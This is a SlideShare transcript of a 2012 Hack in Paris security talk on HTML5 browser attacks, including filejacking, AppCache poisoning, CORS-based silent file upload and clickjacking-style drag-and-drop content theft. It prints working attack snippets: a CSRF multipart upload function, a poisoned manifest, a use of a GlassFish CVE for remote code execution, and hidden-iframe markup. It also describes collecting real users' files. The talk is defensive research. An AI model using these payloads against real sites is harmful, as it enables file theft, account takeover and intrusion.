Html5: Something wicked this way comes (Hack in Paris)
•
2 likes•15,453 views
The talk given in Hack In Paris 2012 conference
Recommended
Recommended
More Related Content
What's hot
What's hot (20)
Viewers also liked
Viewers also liked (20)
Similar to Html5: Something wicked this way comes (Hack in Paris)
Similar to Html5: Something wicked this way comes (Hack in Paris) (20)
More from Krzysztof Kotowicz
More from Krzysztof Kotowicz (11)
Recently uploaded
Recently uploaded (20)
Html5: Something wicked this way comes (Hack in Paris)
- 1. H TML5 Krzysztof Kotowicz, SecuRing kkotowicz@securing.pl @kkotowicz
- 2. Meet Bob 2
- 3. Meet Bob #1 Bob is a CSO of largebiz.com #1b Bob has interesting stuff #2 I don’t like Bob #3 I want to pwn Bob 3
- 4. Bob’s pwnage stage #1 • Bob has a hobby - e.g. hacking • He has cool file://s • I want to get them! • He’s not THAT stupid to run EXE, SCR etc. • Use filejacking! 4
- 5. Filejacking • HTML5 directory upload (Chrome only) <input type=file directory> • displays this ====> • JS gets read access to all files within chosen folder 5
- 6. Filejacking Business plan • set up tempting webpage • overlay input (CSS) with • wait for Bob • get files & upload them to your server 6
- 7. Filejacking 7
- 8. Filejacking 8
- 9. Filejacking • I’ve tried this IRL • How clueless users actually are? • http://kotowicz.net/wu running for ~13 mo • very limited exposure • only websec oriented visitors • 298 clients connected (217 IPs) • tons of interesting files 9
- 10. Filejacking LOTS of these ------> • Downloads/# BeNaughtyLive.com/ • Downloads/# GoLiveTrannies.com/ • BratSluts 11 12 04 Sasha Cane Red Tartan SchoolGirl XXX 720p WMV SEXORS.nzb • bitches/1300563524557.jpg • Flowchart-Fap-To-It.jpg 10
- 11. Filejacking • websec staff! • but surely no private data? 11
- 12. Filejacking • Wireless Assess points.txt • interesting network next to me.txt • onlinePasswords.txt • s/pw.txt • letter of authorization.pdf • Staff-<name,surname>.pdf • <name,surname> - resume.doc • Pricing-Recommendation_CR.xlsm.zip • but surely no clients data? 12
- 13. Filejacking • sony reports/ • Faktura_numer_26_2011_ 0045_sonymusic.##.zip <company>.pdf • SecurityQA.SQL.Injection. • websec cred~ Results.v1.1.docx • security_users.sql.zip • SSOCrawlTest5.4.097.xml • !important - questions for • IPS CDE Wireless Audit- web developers.docx January 2011-1 0.docx • sslstrip.log~ • IPS Wireless Testing • ##### Paros Log.txt Schedule April 2011.xls • 01-####### Corporation (Security Unarmed So much for NDAs... Guard).xls 13
- 14. Filejacking + All your file are belong to me + Trivial to set up + Filter files by e.g. extension, size etc. - Chrome only - Requires users prone to social- engineering 14
- 15. Bob’s pwnage stage #2 • Bob travels a lot & loves Facebook • I want to control Bob’s FB account • even when he changes the password in a month • I want to fingerprint Bob’s intranet • Use rogue access point & AppCache poisoning! 15
- 16. AppCache poisoning HTML5 Offline Web Applications <html manifest=cache.manifest> • cache.manifest lists URLs to cache • cache expires only when CACHE MANIFEST index.html manifest is changed stylesheet.css images/logo.png scripts/main.js 16
- 17. AppCache poisoning Poison Wait Profit AppCache for Bob 17
- 18. AppCache poisoning • DEMO • Quirks used: • manifest must be MIME text/cache-manifest • Chrome fills AppCache without user confirmation 18
- 19. AppCache poisoning • tamper http://victim/ <html manifest=/robots.txt> <script>evil()</script> • tamper http://victim/robots.txt CACHE MANIFEST CACHE: http://victim/ NETWORK: * 19
- 20. AppCache poisoning Later on, after m-i-t-m: 1. http://victim/ fetched from AppCache 2. browser checks for new manifest GET /robots.txt 3. receives text/plain robots.txt & ignores it 4. tainted AppCache is still used 20
- 21. AppCache poisoning + Poison any URL + Payload stays until manually removed - Chrome or Firefox with user interaction - Needs active man-in-the-middle to inject https://github.com/koto/sslstrip 21
- 22. Bob’s pwnage stage #3 • Bob loves sharing photos (Flickr?) • I want to replace Bob as CSO • What if Bob uploaded some discrediting files? • Try silent file upload 22
- 23. Silent file upload • File upload purely in Javascript • Emulates <input type=file> with: • any file name • any file content • File constructed in Javascript (it’s not a real file!) • Uses Cross Origin Resource Sharing 23
- 24. Silent file upload • Cross Origin Resource Sharing = cross domain AJAX http://attacker.com/ var xhr = new XMLHttpRequest(); xhr.open("POST", "http://victim", true); xhr.setRequestHeader("Content-Type", "text/plain"); xhr.withCredentials = "true"; // send cookies xhr.send("Anything I want"); 24
- 25. Silent file upload • raw multipart/form-data request function fileUpload(url, fileData, fileName) { var boundary = "xxxxxxxxx", xhr = new XMLHttpRequest(); xhr.open("POST", url, true); xhr.withCredentials = "true"; xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary); 25
- 26. Silent file upload var b = " --" + boundary + 'rn Content-Disposition: form-data; name="contents"; filename="' + fileName + '"rn Content-Type: application/octet-streamrn rn ' + fileData + 'rn --' + boundary + '--'; xhr.setRequestHeader("Content-Length", b.length); xhr.send(b); 26
- 27. Silent file upload + No user interaction + Works in most browsers + You can add more form fields - CSRF flaw needed - No access to response 27
- 28. Silent file upload DEMO Flickr.com 28
- 29. Silent file upload • GlassFish Enterprise Server 3.1. • CVE 2012-0550 by Roberto Suggi Liverani • //goo.gl/cOu1F logUrl = 'http://glassfishserver/ management/domain/applications/ application'; fileUpload(c,"maliciousarchive.war"); • logged admin + CSRF = RCE 29
- 30. Same origin policy • makes web (relatively) safe • restricts cross-origin communication • can be relaxed though • crossdomain.xml • document.domain • HTML5 Cross Origin Resource Sharing • or ignored... • UI redressing 30
- 31. UI Redressing? Jedi mind tricks on victim users 31
- 32. UI Redressing • This is not the page you’re looking at • This is not the thing you’re clicking • .................................................. dragging • .................................................. typing • .................................................. copying • Victims attack the applications for us 32
- 33. Clickjacking? 33
- 34. Bob’s pwnage stage #4 • Bob likes online games • I found a vulnerable website used by Bob • Bob would have to type the payload himself :-( • Make Bob play a game! 34
- 35. Drag into • Put attackers content into victim form Demo 35
- 36. Drag into + Inject arbitrary content + Trigger self-XSS - Firefox only (will die soon!) - X-Frame-Options 36
- 37. Bob’s pwnage stage #5 • Bob has access to internal HR application • I want to know his salary • Make Bob play a game (again)! 37
- 38. Drag out content extraction image image 38
- 39. Drag out content extraction image victim <iframe> image 39
- 40. Drag out content extraction image victim <iframe> textarea <textarea> 40
- 41. Drag out content extraction <div id=game style="position:relative"> <img style="position:absolute;..." src="paper.png" /> <img style="position:absolute;..." src="trash.png" /> <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."> </iframe> <textarea style="position:absolute; opacity:0;..." id=dropper></textarea> </div> 41
- 42. Drag out content extraction 42
- 43. Drag out content extraction 43
- 44. Drag out content extraction Demo . 44
- 45. Drag out content extraction + Access sensitive content cross domain - Firefox only (will die soon!) - X-Frame-Options 45
- 46. Summary • HTML5 is attacker’s friend too! • Don’t get framed • Users based pwnage FTW Developers: Use X-Frame-Options: DENY 46
- 47. Wake up, I’m done! • html5sec.org • code.google.com/p/html5security • www.contextis.co.uk/research/white-papers/clickjacking • blog.kotowicz.net • github.com/koto Twitter: @kkotowicz kkotowicz@securing.pl Thanks @0x6D6172696F, @garethheyes, @theKos, @7a_, @lavakumark, @malerisch, @skeptic_fx, .... 47